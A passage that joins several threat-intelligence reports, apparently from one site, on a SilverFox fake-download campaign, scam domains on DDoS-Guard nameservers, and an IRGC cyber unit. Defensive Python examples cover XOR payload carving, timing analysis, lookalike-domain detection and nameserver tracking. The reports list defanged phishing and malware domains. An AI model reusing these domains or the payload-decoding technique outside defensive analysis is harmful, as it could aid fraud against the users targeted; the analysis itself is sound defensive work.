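    decoded = xor_decode(blob, key)
    off = find_pe(decoded)
    return None if off is None else decoded[off:]


def build_fake_pe_stub() -> bytes:
    """Constructed stand-in for a PE: a 0x40-byte DOS header whose e_lfanew points at "PE\0\0".

    Only the fields the triage code checks are populated; this is not a loadable executable.
    """
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", dos, E_LFANEW_OFFSET, 0x40)  # e_lfanew = 0x40
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 16


# Constructed sample: a NOP-sled-like prefix followed by the stub, XOR-encoded with
# the same 0x25 key the report describes for the downloaded 617.txt stage.
SAMPLE_KEY = 0x25
SAMPLE_BLOB = xor_decode(b"\x90" * 32 + build_fake_pe_stub(), SAMPLE_KEY)

if __name__ == "__main__":
    key = recover_xor_key(SAMPLE_BLOB)
    print(f"recovered key: {key:#04x}")
    pe = carve_pe(SAMPLE_BLOB, key)
    print(f"embedded PE found, {len(pe)} bytes from the MZ header onward")
```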
Fake Alipay Checkout
The domain displays a fake popup stating it cannot operate currently due to the use of abnormal operation mode. The buttons Get Help Now and Cancel are displayed, which prompt a download of a malicious file.
yeepays[.]xyz


An imported JavaScript file defines the download path
“yeepays[.]xyz/assets/js/external_load.js”

The filename is defined in another imported JavaScript file
“yeepays[.]xyz/assets/download/filename.js”

The download URL for the malicious file then becomes:
Fake Cryptocurrency Sites
coinbaw[.]vip


Clicking most of the interactive buttons redirects to a fake sign-in page for a fake crypto exchange named “CoinBaw”, which likely attempts to spoof as CoinBase.
Registration Details
Mapping over 2,800 of the actor’s registered domains since June 2024, we observed similar trends in timing.
Domain Registrations Create Date

Domain Resolutions First Seen

Comparing the registration creation times of the domains with their first-seen resolutions from DNS lookups lets us approximate likely human working hours from commonalities in infrastructure acquisition and operationalization. Both events can be largely automated, so the timing of either one is unreliable on its own, but together they may offer valuable insight, particularly into the regions in which the activity is likely concentrated.
We observed a similar distribution across time for both domain acquisition and potential operationalization. Operationalization here means the step after registering the domains and associated infrastructure: putting them to some operational use, in this case delivering malware via spoofed application download pages. The majority of both events occur during normal Chinese working hours, and the volume of first-seen resolutions for those domains likewise peaks during normal Chinese working hours.
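The timing comparison above can be reproduced over any registration and passive DNS feed. This added example (not code from the DomainTools report) takes constructed records with UTC create and first-seen timestamps, converts each event to a candidate operator timezone, builds an hour-of-day histogram, and reports what share of activity falls inside a working-hours window; fixed UTC offsets stand in for a tz database so it runs anywhere.

```python
"""Working-hours analysis of domain creation vs. first-seen resolution (added example)."""
from collections import Counter
from datetime import datetime, timedelta, timezone

WORK_HOURS = range(9, 18)  # 09:00-17:59 local is treated as "working hours"
# Fixed offsets instead of a tz database. Asia/Shanghai has no DST; the New York
# value is the June (EDT) offset matching the sample dates.
OFFSETS = {"Asia/Shanghai": 8, "UTC": 0, "America/New_York (EDT)": -4}

# Constructed sample: (domain, create time UTC, first-seen resolution UTC)
RECORDS = [
    ("example-a.top", "2025-06-02T01:12:00Z", "2025-06-02T03:40:00Z"),
    ("example-b.top", "2025-06-02T02:05:00Z", "2025-06-02T05:20:00Z"),
    ("example-c.xyz", "2025-06-03T06:48:00Z", "2025-06-03T07:30:00Z"),
    ("example-d.vip", "2025-06-03T09:15:00Z", "2025-06-03T10:05:00Z"),
    ("example-e.top", "2025-06-04T17:30:00Z", "2025-06-04T18:10:00Z"),
    ("example-f.xyz", "2025-06-05T23:55:00Z", "2025-06-06T00:30:00Z"),
]
CREATE, FIRST_SEEN = 1, 2  # tuple indices of the two event timestamps


def parse_utc(ts: str) -> datetime:
    """Parse an ISO-8601 UTC timestamp with trailing Z into an aware datetime."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def local_hour(ts: str, tz: str) -> int:
    """Hour of day (0-23) of a UTC timestamp in the candidate timezone."""
    return parse_utc(ts).astimezone(timezone(timedelta(hours=OFFSETS[tz]))).hour


def hour_histogram(records, field: int, tz: str) -> Counter:
    """Events per local hour for one event type (CREATE or FIRST_SEEN)."""
    return Counter(local_hour(r[field], tz) for r in records)


def working_hours_share(records, field: int, tz: str) -> float:
    """Fraction of events whose local hour falls inside WORK_HOURS."""
    hist = hour_histogram(records, field, tz)
    total = sum(hist.values())
    return sum(c for h, c in hist.items() if h in WORK_HOURS) / total if total else 0.0


def lag_hours(records) -> dict:
    """Hours between registration and first observed resolution, per domain."""
    return {
        d: (parse_utc(seen) - parse_utc(created)).total_seconds() / 3600
        for d, created, seen in records
    }


if __name__ == "__main__":
    for tz in OFFSETS:
        print(f"{tz:24s} create in work hours: {working_hours_share(RECORDS, CREATE, tz):.0%}"
              f"  first-seen in work hours: {working_hours_share(RECORDS, FIRST_SEEN, tz):.0%}")
    for d, h in lag_hours(RECORDS).items():
        print(f"{d}: operationalized {h:.1f}h after creation")
```

With real feeds the interesting signal is the timezone under which both histograms concentrate in the same window; a flat distribution in every timezone points to automation.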
Changes In Operations
The actor has implemented several changes in their operational tactics. This includes the addition of rudimentary anti-automation and browser emulation code, designed to hinder site scanners from effectively retrieving website content. Furthermore, there has been a reduction in the use of site tracker services such as Baidu, Gtag, and Facebook. The actor has also increased the number of servers used to spread domain resolution more widely, and adopted more discreet registration details to obscure uniquely identifiable information.
Conclusion
The "SilverFox" actor continues to demonstrate a high degree of persistence and scale in their malware delivery operations, primarily targeting Chinese-speaking individuals and entities globally with Windows-specific malware. Their campaign, ongoing since at least June 2023, leverages over 2,800 created domains, with 266 remaining active since December 2024, highlighting their sustained infrastructure and reliability improvements. The consistent operational timing across all hours, with high influxes during Chinese working hours, together with the other factors above, suggests a combination of automated and likely human-driven approaches to their activities.
While the actor's ultimate motivations remain somewhat uncertain, their tactics strongly suggest financially motivated and opportunistic objectives. We suspect their primary goals include credential and financial theft, and potentially access brokering. Furthermore, the observed targeting of individuals engaged in sales and marketing, particularly those outside China but involved in business prospects within the region and possessing Chinese language skills, points to a potential secondary motivation to exploit specific professional networks for further gains.
Modern browsers like Chrome and Edge provide a critical, multi-layered defense against malware from fake download sites. They use integrated security systems—Google Safe Browsing and Microsoft Defender SmartScreen—to proactively block malicious websites before they can be accessed. At the point of download, these browsers analyze files for risk by checking their reputation and digital signatures, and provide clear, direct warnings to prevent users from accidentally running dangerous software.
While current detection rates of SilverFox payloads show limitations, it's crucial to recognize that browser security is a constantly evolving battleground. Browser developers are continually refining their defenses, integrating more advanced AI and machine learning models to identify and block novel threats in real-time. This ongoing technological advancement, however, highlights a fundamental truth: the most sophisticated digital warnings are ultimately supplementary to an aware user.
To counter the persistent threat posed by SilverFox, organizations and individuals should prioritize the following security measures:
- Elevate User Awareness: Conduct phishing simulations and training, and emphasize secure software acquisition from official sources.
- Strengthen Email and Web Gateway Security: Implement ATP, integrate threat intelligence feeds for URL filtering and domain reputation, and employ DNS filtering.
- Enhance Endpoint Security and Response: Deploy NGAV/EDR across Windows endpoints and ensure automated patch management.
- Implement Network Monitoring and Segmentation: Analyze network traffic for indicators of compromise and segment networks to limit lateral movement.
- Prioritize Identity and Access Management: Enforce Multi-Factor Authentication (MFA) for all user accounts.
IOCs
Domains, file URLs, and hashes can be found on our GitHub.

🎵 Sometimes you wanna go
Where everybody knows your name
And they're always glad you came 🎵
~Theme from Cheers
Everyone should have a place to go where they’re comfortable, can pull up a comfy infrastructure barstool, and just kick back and enjoy life.
Everyone except malicious actors.
At DomainTools Investigations we take a special interest in the comfort and caretaking of bad actors, wherever it may occur. Whether it’s a den of aspiring hackers stretching their wings, domain registrar business decisions welcoming in Russian disinformation peddlers, or even mapping out ransomware actor musical chairs, you could say we pay keen attention to the care and feeding of predatory ecosystems.
So it’s no surprise that we’re looking at DNS all the time, day, night and otherwise. Even during leap seconds.
Nameservers and Detecting Threats
They say “to reach people, meet them where they’re at” and in our corporate mission to reach more and more bad actors we’ve taken this to heart. By intensely monitoring nameservers where criminals feel comfortable, we’re able to understand the ebb and flow of whole campaigns as well as opportunistic one-offs as domains circulate between registrars, hosts, and transient infrastructure.
We turn here to the Russian bulletproof hosting service DDoS-Guard. The name is familiar to most in cybersecurity, with a profile that’s led to the then-Chairwoman of the House Oversight Committee pointing out DDoS-Guard links to the Russian government as well as Brian Krebs laying out the complex web of controversies the hosting company supported at the time, from Hamas to 8chan.
DDoS-Guard’s enablement of criminal activity, terrorism, and espionage is not exactly a secret.
Analyzing only a month’s worth of nameserver activity for DDoS-Guard provides an important glimpse into their current corner of the internet. Activity from 2025-05-13 through 2025-06-11 shows thousands of activities, from transfers in and out of the service (illuminating other sources and destinations) to domain creation and deletion. Analyzing this also allows better understanding of where DDoS-Guard sits in the nexus of services used for malicious interests, pointing at large spaces for possible future research.

In isolating domains transferred in and out of DDoS-Guard nameservers, 269 domains were observed being transferred in from other services, 408 domains were transferred out from DDoS-Guard to other services, 677 new domains were created, and 199 domains were deleted.

For the purposes of this post, we can sort observed domains into three separate buckets, in order of proportion seen: temporary gambling/betting domains, cryptocurrency-targeting domains, and indeterminate/other. The temporary domains were obvious thanks to repetitive, incremented numbers across many alike names as well as their short lifespans on the service: most were new, in non-English languages like Indonesian and Turkish, and deleted within two weeks of creation. A smaller subset was transferred out, mostly to my-ndns[.]com and cloudflare.
Registrar[.]eu appears in the “transfer out” section as an outlier due to a single cluster of 72 domains either targeting or spamming for Russian gambling website Pokerdom. All examples include landing pages in Russian simulating Pokerdom terms of service or login paths, and all used the TLD top. Historical data shows this cluster was spun up on DDoS-Guard one year previous and transferred out to Registrar[.]eu instead of being renewed.
Observing nameservers, as noted, also allowed us to see where DDoS-Guard lies in relation to bad actors constantly shopping their domains from service to service to try and avoid detection or blocklisting. Several notable examples came up in research.
Bioservamerica[.]com sounds like a perfectly reasonable domain from afar. However, seeing it become newly active after three years of dormancy and then bouncing between DDoS-Guard and Cloudflare caused us to take a closer look. In fact, bioservamerica[.]com is the domain for an Indonesian gambling website utilizing the age of the domain to evade some risk metrics.


An investigative rabbit hole deepened the more we dug. Bioservamerica[.]com redirected to capecodrestaurantweek[.]com; sharing that redirect was restaurantweekcapecod[.]com. A pivot on the registrant for the latter led to a dozen chef- or restaurant-themed websites that appear to serve as redirects for a massive network either supporting black-market gambling sites or attempting to phish those users. Passive DNS revealed suspiciously rapid and ongoing DNS changes suggestive of fast flux or a similar technique for capecodrestaurantweek[.]com. All told, this network appeared to be acquiring aged domains and utilizing sophisticated obfuscation and redirection techniques and is due for further research.

Another elementary finding while observing DDoS-Guard nameservers involves a campaign targeting holders of Vanilla gift cards, a Visa product. DDoS-Guard users are fans of “com” domains: apex domains whose left-hand label begins with “com”, so that targeted subdomains can deceive victims about the actual site. In practice, the domain comtrackmycom[.]com utilizes subdomains like “www.vanillagift,” so the user sees www.vanillagift[.]comtrackmycom[.]com. In many situations, our perception blocks out everything after the first “com”, so the URL seems legitimate. This domain spun up on DDoS-Guard on 2025-06-02 and, while blocklisted, still appears to be active.
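The “com” trick above can be caught mechanically by asking what a skimming reader would perceive as the site versus what the registrable domain actually is. The following added example (not code from the DomainTools post) does that with a deliberately simple heuristic: it takes the last two labels as the apex (adequate for the .com-style cases in the post; a public suffix list would be needed for multi-part TLDs), checks whether the apex's left label begins with a TLD token, and cross-checks the perceived brand against a constructed watchlist. The hostnames other than the post's own are constructed.

```python
"""Detect hostnames whose subdomain labels imitate a well-known registrable domain (added example)."""

TLD_TOKENS = ("com", "net", "org")
# Constructed watchlist of brands the post describes as targeted.
WATCHED_BRANDS = {"vanillagift", "hellcase", "ledger", "coinbase", "metamask"}


def _labels(hostname: str) -> list:
    return hostname.lower().rstrip(".").split(".")


def registrable_domain(hostname: str) -> str:
    """Apex (last two labels) of a hostname; adequate for the .com-style TLDs in the post."""
    return ".".join(_labels(hostname)[-2:])


def leading_tld_token(apex_label: str):
    """TLD token the apex's left label begins with, e.g. "com" for "comtrackmycom", else None."""
    for tok in TLD_TOKENS:
        if apex_label.startswith(tok) and len(apex_label) > len(tok):
            return tok
    return None


def perceived_domain(hostname: str):
    """Domain a reader is likely to see, e.g. "vanillagift.com" for www.vanillagift.comtrackmycom.com.

    Returns None when there are no subdomain labels or the apex label does not start
    with a TLD token.
    """
    labels = _labels(hostname)
    if len(labels) < 3:
        return None
    tok = leading_tld_token(labels[-2])
    if tok is None:
        return None
    # The label just before the apex reads as the "second-level domain" of the perceived site.
    return f"{labels[-3]}.{tok}"


def assess(hostname: str) -> dict:
    """Combine the perceived-domain check with the brand watchlist into a verdict."""
    seen_as = perceived_domain(hostname)
    brand = seen_as.split(".")[0] if seen_as else None
    if seen_as is None:
        verdict = "clean"
    elif brand in WATCHED_BRANDS:
        verdict = "high"      # pattern present and it imitates a watched brand
    else:
        verdict = "review"    # pattern present; benign apexes like company.com also match
    return {
        "hostname": hostname,
        "registrable": registrable_domain(hostname),
        "perceived_as": seen_as,
        "verdict": verdict,
    }


SAMPLE_HOSTNAMES = [
    "www.vanillagift.comtrackmycom.com",    # the case from the post (defanged there)
    "www.vanillagift.com",                  # the legitimate shape
    "login.hellcase.comsupportcenter.net",  # constructed
    "mail.example.company.com",             # constructed: shows the heuristic's false-positive class
]

if __name__ == "__main__":
    for h in SAMPLE_HOSTNAMES:
        print(assess(h))
```

The "review" tier exists because an apex such as company.com legitimately starts with a TLD token; in practice that tier is worth an allow-list rather than an alert.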
Digital Assets
A popular target for DDoS-Guard users is players of the popular first-person shooter game CounterStrike: GO. CounterStrike has a long history of strangeness around its weapon skin system, which allows users to apply custom decorative designs to their in-game weapons rated by the rarity in which they emerge from game loot boxes (“cases”). Game company Valve halted the entire system in 2019 for a redesign after discovering nearly all transactions were involved in money laundering. DDoS-Guard nameservers reveal a number of candidates for investigation:
Csmoney[.]to, created on DDoS-Guard on 2025-05-28 is likely impersonating the trading marketplace cs[.]money for phishing purposes.
The domain hellcase[.]com appears to be a legitimate site surrounding case-opening and exclusive skins. However, on DDoS-Guard we see at least one actor deeply comfortable with the service, spinning up over a dozen new domains targeting CS:GO and Hellcase users, as well as transferring domains in and out. Despite being less than a month old at the time of writing, the below domains all show as having already been added to third-party blocklists:
Cs2-hellcas[.]com
Hell2cs[.]com
Hellcs2-events[.]com
Hellcs2promo[.]com
Hellcspromo[.]com
Hlcase-event[.]com
Hlcases-events[.]com
Hlcases-promotional[.]com
Hlcs-promo[.]com
Hlcs-promotionals[.]com
Highlighting the traffic flows in and out of DDoS-Guard nameservers, we can observe hlcases-events[.]com transferred out to Cloudflare, and cs2-hellcas[.]com transferred in from 1reg[.]buzz. The actor(s) targeting CS:GO and Hellcase users seemed mostly comfortable with DDoS-Guard during the month of observation, but this kind of activity raises a question for further research about fingerprinting risk by measuring nameserver transitions.
Cryptocurrency
Video game weapon skins aren’t the only digital asset being targeted from Russia. DDoS-Guard nameserver activity provided a wealth of information on scams and phishing targeting cryptocurrency users. In one month, domains were observed aimed at the following protocols and platforms: Atomic, Bluefish, Brex, Coinbase, Cortex, DefiSaver, Dragonswap, Felix, Hybridge, Hyperion, Hyperlend, Hyperswap, Ledger, Mercury, MetaMask, Nexus, Odos, SoSoValue, Trezor, Tron, UsualMoney, and YieldNest.
Pivots on those domains provided insight into additional apex-level domains or subdomains targeting DEXscreenr, MyEtherWallet, Phantom, Phala, Rabby, Rainbow, Rarible, Safepal, Sui, Trust, Uniswap, and more.
That’s quite the list for one month’s worth of watching, it feels like.
Patterns emerged in several cases of domains created on DDoS-Guard and either deleted within days or transferred out to another set of nameservers within a week.
Let’s discuss some example findings.
YieldNest[.]finance is a restaking token aiming to increase earnings through advancing liquidity in the Ethereum ecosystem. Yet someone’s also looking to restake a claim:
Despite all of these domains being up for less than a week, they all showed a connection to infrastructure, passive DNS indicated resolutions in the wild, and they all substantially diverged from YieldNest’s primary domain profile. IP address, MX record, and tracker pivots on these five domains surfaced several more targeting YieldNest, as well as domains targeting Coinbase, the Oasis protocol, payment processor Coinwall, PLANET token, and more. While PDR and Reg[.]ru were observed, behavior indicated an overwhelming preference for DDoS-Guard, as well as a strong preference for the use of Cloudflare and Namecheap. Many of these domains show abnormal daily changes to either MX or NS records during their period of activity.
While more research is necessary over a longer term to validate it, monitoring problematic nameservers shows promise as a traffic supernode to establish behavior patterns that can support more complex and targeted observation and detection of malicious actors.
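The nameserver transitions described in the CS:GO findings, the abnormal daily NS/MX changes noted for the YieldNest cluster, and the "traffic supernode" idea above all reduce to one computation over daily passive DNS observations. This added example (not code from the DomainTools post) walks a constructed feed, derives transfers into and out of a watched nameserver provider from consecutive NS values, counts per-domain record churn, and lists domains currently parked on the watched provider (the population a blanket block of ddos-guard[.]net nameservers would cover). Dates and domains for the Hybridge and Hellcase rows follow the post; the nameserver hostnames, the yieldnest-claim[.]example domain and the MX values are constructed.

```python
"""Transfers, churn and current-provider views from daily NS/MX observations (added example)."""
from collections import defaultdict

WATCHED_NS_SUFFIX = "ddos-guard.net"
CHURN_THRESHOLD = 3  # record changes within the feed window that we call abnormal

# Constructed daily observations: (date, domain, rrtype, value). Defanged like the post;
# nameserver hostnames are placeholders, not the providers' real NS names.
OBSERVATIONS = [
    ("2025-05-09", "app-hybridge[.]finance", "NS", "ns1.ddos-guard[.]net"),
    ("2025-05-30", "app-hybridge[.]finance", "NS", "ns1.registrar[.]eu"),
    ("2025-05-31", "app-hybridge[.]finance", "NS", "ns1.ddos-guard[.]net"),
    ("2025-05-26", "hybridge[.]finance", "NS", "ns1.ddos-guard[.]net"),
    ("2025-05-27", "hybridge[.]finance", "NS", "ns1.regery[.]net"),
    ("2025-06-01", "hlcases-events[.]com", "NS", "ns1.ddos-guard[.]net"),
    ("2025-06-05", "hlcases-events[.]com", "NS", "ns1.cloudflare[.]com"),
    ("2025-06-02", "cs2-hellcas[.]com", "NS", "ns1.1reg[.]buzz"),
    ("2025-06-04", "cs2-hellcas[.]com", "NS", "ns1.ddos-guard[.]net"),
    ("2025-06-01", "yieldnest-claim[.]example", "MX", "mx1.mail[.]example"),
    ("2025-06-02", "yieldnest-claim[.]example", "MX", "mx2.mail[.]example"),
    ("2025-06-03", "yieldnest-claim[.]example", "MX", "mx3.mail[.]example"),
    ("2025-06-04", "yieldnest-claim[.]example", "MX", "mx1.mail[.]example"),
    ("2025-06-04", "yieldnest-claim[.]example", "NS", "ns1.ddos-guard[.]net"),
]


def refang(name: str) -> str:
    """Turn a defanged name back into a comparable hostname."""
    return name.replace("[.]", ".").lower()


def is_watched(ns: str) -> bool:
    return refang(ns).endswith(WATCHED_NS_SUFFIX)


def timelines(observations, rrtype: str) -> dict:
    """domain -> [(date, value), ...] for one record type, in date order (ISO dates sort as strings)."""
    out = defaultdict(list)
    for date, domain, rt, value in observations:
        if rt == rrtype:
            out[refang(domain)].append((date, refang(value)))
    for tl in out.values():
        tl.sort()
    return out


def transfers(observations) -> dict:
    """Transfers into and out of the watched provider, from consecutive NS values.

    "in" entries carry the previous provider's NS; "out" entries carry the destination NS.
    """
    events = {"in": [], "out": []}
    for domain, tl in timelines(observations, "NS").items():
        for (_, prev), (date, cur) in zip(tl, tl[1:]):
            if is_watched(cur) and not is_watched(prev):
                events["in"].append((domain, date, prev))
            elif is_watched(prev) and not is_watched(cur):
                events["out"].append((domain, date, cur))
    return events


def change_counts(observations, rrtype: str) -> dict:
    """How many times each domain's value for rrtype changed between consecutive observations."""
    return {
        d: sum(1 for (_, a), (_, b) in zip(tl, tl[1:]) if a != b)
        for d, tl in timelines(observations, rrtype).items()
    }


def abnormal_churn(observations, threshold: int = CHURN_THRESHOLD) -> list:
    """Domains whose NS or MX record changed at least `threshold` times in the window."""
    flagged = set()
    for rrtype in ("NS", "MX"):
        flagged.update(d for d, n in change_counts(observations, rrtype).items() if n >= threshold)
    return sorted(flagged)


def currently_on_watched(observations) -> list:
    """Domains whose latest observed NS is the watched provider: the blanket-block population."""
    return sorted(d for d, tl in timelines(observations, "NS").items() if is_watched(tl[-1][1]))


if __name__ == "__main__":
    ev = transfers(OBSERVATIONS)
    print("transfers in: ", ev["in"])
    print("transfers out:", ev["out"])
    print("abnormal churn:", abnormal_churn(OBSERVATIONS))
    print("currently on watched NS:", currently_on_watched(OBSERVATIONS))
```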
Another great example is several domains targeting the Ledger wallet and app. En-ledger[.]to was created on DDoS-Guard services on 2025-05-27 and provided an excellent IP address pivot to 70+ domains almost exclusively targeting cryptocurrency wallets like Atomic, MetaMask, MyEtherWallet, Trezor, and Trust (among others). Most are currently blocklisted with an astronomically high average third-party risk score.
Common infrastructure characteristics across the cluster:
Another popular target in this brief glimpse into DDoS-Guard was cross-chain swap Hybridge. Cross-chain bridges and swaps allow users to exchange tokens from one chain with tokens from a different chain, and in practice they hold a sizable amount of cryptocurrency in hot storage for this purpose, making them a juicy prize.
App-hybridge[.]finance was created on DDoS-Guard on 2025-05-09, transferred to registrar[.]eu nameservers on 2025-05-30, and back to DDoS-Guard on 2025-05-31. A screenshot from urlscan[.]io of the landing page on 2025-05-26 shows an emulated login page.

It should be noted that no results either in the documentation of Hybridge nor on their social media indicate a domain of anything other than hybridge[.]xyz, so both hybridge[.]finance and app-hybridge[.]finance appear to be malicious; both connected to DDoS-Guard, with hybridge[.]finance transferring out to regery[.]net on 2025-05-27 and app-hybridge[.]finance transferring out and back in as noted above.
Conclusion
Above we’ve discussed the results of observing nameservers for Russian bulletproof host DDoS-Guard for a single month, 2025-05-13 through 2025-06-11. Results showed a vast array of threats, but the most active targeted the cryptocurrency sphere in very specific ways, especially through emulating wallets, exchanges, and cross-chain swaps.
There is more work to do and more bad actors, like DDoS-Guard, that provide a haven for criminal activity. Utilizing DNS and domain intelligence, as well as nameserver surveillance over an extended period of time, gives us a feel for the traffic flows of domain services, watching likely or proven malicious domains spin up, get deleted, and transfer in and out.
Digital assets, cryptocurrency, and other decentralized finance services should ensure that they monitor not just new or newly active domains and subdomains but also identify those service providers that give comfort to scammers, phishers, and others. This allows those services a much more clear day-to-day understanding of the prolific and varied threat environment they face, informing both the ways they protect their infrastructure and how they can educate users to protect themselves.
Cryptocurrency and decentralized finance users can protect themselves by staying informed of the threats the sector faces and staying current on the news, as well as engaging with protective DNS solutions and other blocklists that not only use third-party data but allow the user to input domains, services, and other characteristics into their blocklist. The simple act of blocking any domain with ddos-guard[.]net nameservers may serve to cut dozens or hundreds of direct threats per month.
More research along these lines is forthcoming from DomainTools Investigations.

A Profile of Iran’s Covert Cyber Strike Unit and Its Psychological Warfare Extension
Executive Summary
Intelligence Group 13, embedded within the Shahid Kaveh Cyber Group, represents one of the most operationally aggressive and ideologically fortified units within the Islamic Revolutionary Guard Corps (IRGC) cyber arsenal. Positioned at the confluence of tactical cyber-espionage, industrial sabotage, and psychological warfare, the group is uniquely equipped to respond to geopolitical escalations, particularly in light of the recent U.S. airstrikes targeting Iranian nuclear facilities, which have significantly heightened the risk of asymmetric retaliation.
As Iran faces intensified pressure and public calls for reprisal, it is assessed that it is increasingly likely that IRGC cyber divisions will be leveraged for retaliatory digital operations. Intelligence Group 13, already known for its history of intrusions into critical infrastructure, including U.S. water systems and Israeli control networks, now finds itself in a strategic posture to deliver retributive action through cyberspace. Whether through direct disruption, pre-positioned malware activation, or narrative defacement and psychological intimidation, the group's capabilities make it a prime tool for hybrid response, combining deniable technical aggression with symbolic messaging designed to project defiance and psychological impact.
Functioning under the umbrella of the IRGC’s broader cyber command, which includes the Electronic Warfare and Cyber Defense Organization (EWCD), the Intelligence Organization (IO), and Quds Force forces like Unit 300, Intelligence Group 13 is not an isolated cell but part of a highly coordinated ecosystem. Its online presence is reinforced by propaganda fronts such as CyberAveng3rs, a media arm that issues threats, amplifies operational claims, and disseminates defacement content through platforms like Telegram and Instagram. Together, these assets form a multi-domain influence architecture that allows Iran to execute cyber retaliation while shaping the narrative battlefield.
This report maps the hierarchy of Intelligence Group 13 within the IRGC, profiles its leadership, outlines its tradecraft and ideological underpinnings, and assesses the increased likelihood of its deployment in near-term retaliatory cyber operations.
Intelligence Team (Group) 13 تیم اطلاعاتی ۱۳
The group (pronounced Team-e Ettela'ati-ye Sizdah) takes its name from Mohammad Kaveh, an IRGC commander who was martyred during the Iran-Iraq War in 1986 at the age of 25. He led elite IRGC operations in Kurdistan and Western Iran and was viewed as a revolutionary model for sacrifice, bravery, and obedience. In keeping with the IRGC’s broader ideological tradition, the title “Shahid” (شهید), meaning martyr, is commonly affixed to the names of operational units, serving both as an homage to fallen commanders and a deliberate invocation of religious-nationalist symbolism. This naming convention reinforces the ideological continuity between the IRGC’s early revolutionary battles and its modern digital warfare initiatives. By invoking martyrdom, such units portray their operations not merely as tactical missions but as sacred continuations of a historical and spiritual struggle. The Shahid Kaveh Group draws directly from this legacy to infuse its cyber operations with ideological legitimacy and emotional resonance. The archived site kaveh313[.]lxb[.]ir hosted tributes, biographical stories, and hagiographic imagery that inform the spiritual framework for the group’s name and mission, blending religious devotion, revolutionary ethos, and digital militarism into a unified operational identity.

IRGC Cyber Command Hierarchy
The Islamic Revolutionary Guard Corps (IRGC) oversees a complex and multi-tiered cyber command architecture designed to fulfill distinct yet interconnected missions across domestic security, intelligence collection, and global offensive operations. This structure is deliberately compartmentalized, allowing the IRGC to conduct covert campaigns while maintaining plausible deniability through the use of proxy units, contractors, and front companies. At the core of this system is the Shahid Kaveh Group, an elite offensive cyber unit that operates with both ideological fervor and technical precision. Intelligence Group 13, its most active tactical team, is fully embedded within this command, drawing operational directives from a triad of IRGC oversight bodies:
- The Electronic Warfare and Cyber Defense Organization (EWCD), which coordinates cyber defense and internal sabotage capabilities,
- The Intelligence Organization (IO), responsible for domestic surveillance and strategic targeting intelligence, and
- The Quds Force (QF), which projects IRGC influence and cyber aggression abroad, particularly through specialized units like Unit 300 and Unit 600.
Together, these divisions provide the Shahid Kaveh Group, and by extension Intelligence Group 13, with the operational cover, intelligence feeds, and strategic alignment necessary to wage hybrid cyber warfare across physical and psychological domains.

Command Structure – Known Figures
The leadership behind Intelligence Group 13 reflects a blend of strategic IRGC command, operational direction, and industrial integration. At the top sits Hamidreza Lashgarian, a senior IRGC cyber official with confirmed affiliations to both the Electronic Warfare and Cyber Defense Organization (EWCD) and Quds Force Unit 300. Lashgarian is widely regarded as the supervisory figure behind the Shahid Kaveh Group, providing overarching guidance on both ideological framing and operational tempo. Beneath him, Reza Salarvand serves as the direct commander of Intelligence Group 13, identified in dissident leaks as the group’s tactical leader and field-level coordinator. Salarvand’s role includes managing target selection, overseeing cyber intrusion campaigns, and aligning Team 13’s actions with IRGC strategic objectives. Supporting these military units is Mohammad Bagher Shirinkar, a key figure embedded in EWCD-linked contractor firms. Shirinkar plays a critical role in bridging the IRGC’s internal operations with its broader technical ecosystem, facilitating tool development, subcontractor oversight, and deniable operational capabilities through civilian-facing fronts.
IRGC High-Level Hierarchy

Placement of Intelligence Group 13 Within IRGC Cyber Org
Intelligence Group 13 functions as the operational spearhead of the Shahid Kaveh Group, a hybrid entity positioned at the intersection of the IRGC’s cyber warfare and Quds Force portfolios. This structural alignment gives Team 13 a unique dual mandate: to execute precision cyber intrusions with military-grade sophistication while simultaneously engaging in psychological and ideological warfare. As a tactical APT (Advanced Persistent Threat) cell, the unit specializes in cyber reconnaissance, disruptive sabotage of critical infrastructure, and the deployment of malware designed to pre-position effects across adversarial networks. Its proximity to both IRGC Electronic Warfare and Cyber Defense (EWCD) and external-facing Quds Force units enables Intelligence Group 13 to operate with both deep access and strategic reach, making it a central instrument of Iran’s asymmetric cyber doctrine.
Internal Chain of Command

Technical Mission and Tactics
The strategic mandate of Intelligence Group 13 centers on disrupting critical infrastructure and shaping adversarial perceptions through covert digital operations. The unit has demonstrated a specific focus on targeting industrial control systems (ICS), including Unitronics PLCs, Israeli electrical grids, U.S. water treatment facilities, and fuel distribution systems, all selected for their high-impact potential and symbolic value. Their campaigns often involve pre-positioning malware, embedding implants within target environments well in advance of activation to enable dormant or timed sabotage. Complementing these efforts is an aggressive intelligence collection posture, relying on phishing, credential theft, and OSINT harvesting to support intrusion planning and post-access operations. Crucially, Team 13 integrates psychological warfare into its strategy, disseminating screenshots, leaks, and taunting messages through propaganda arms like CyberAveng3rs to generate fear, confusion, and reputational damage in tandem with technical effects.
Disinformation & Propaganda: The Role of CyberAveng3rs Patriotic Hacker Wing
CyberAveng3rs serves as the psychological warfare and influence operations extension of Intelligence Group 13, functioning not as an independent actor but as a deliberately constructed propaganda arm embedded within Iran’s cyber doctrine. Rather than remaining in the shadows like traditional APTs, Team 13 leverages CyberAveng3rs to publicize and amplify the psychological impact of its technical operations, turning covert intrusions into open spectacles of defiance. Through Telegram channels, Instagram accounts, and diaspora-linked echo networks, CyberAveng3rs publishes defacement screenshots, malware control panel captures, and operational taunts directed at Western and Israeli infrastructure targets. These narratives are often laced with religious-nationalist motifs, martyr quotes, and anti-Zionist rhetoric, reinforcing the IRGC’s ideological messaging. CyberAveng3rs is not merely reactive; it issues pre-attack warnings, brags post-operation, and threatens future campaigns, making it a key instrument for intimidation, distraction, and symbolic escalation. By fusing information operations with hacking campaigns, it enhances the IRGC’s ability to wage cognitive warfare alongside technical compromise.
Operator: Mr. Soul (Mr_Soulcy)
- Known handles:
  - Instagram: Cyberaveng3rs
  - Telegram: @CyberAveng3rs
  - X: @cyberaveng3rs
- Notable content:
  - Claimed the Aliquippa water system attack (PA, USA)
  - Leaked Unitronics control panel screenshots
  - Issued threats of “Operation IV” aimed at Israeli cybersecurity units
  - Branded style includes martyr quotes, Islamic slogans, and ICS interfaces
Contractor and Front Company Ecosystem
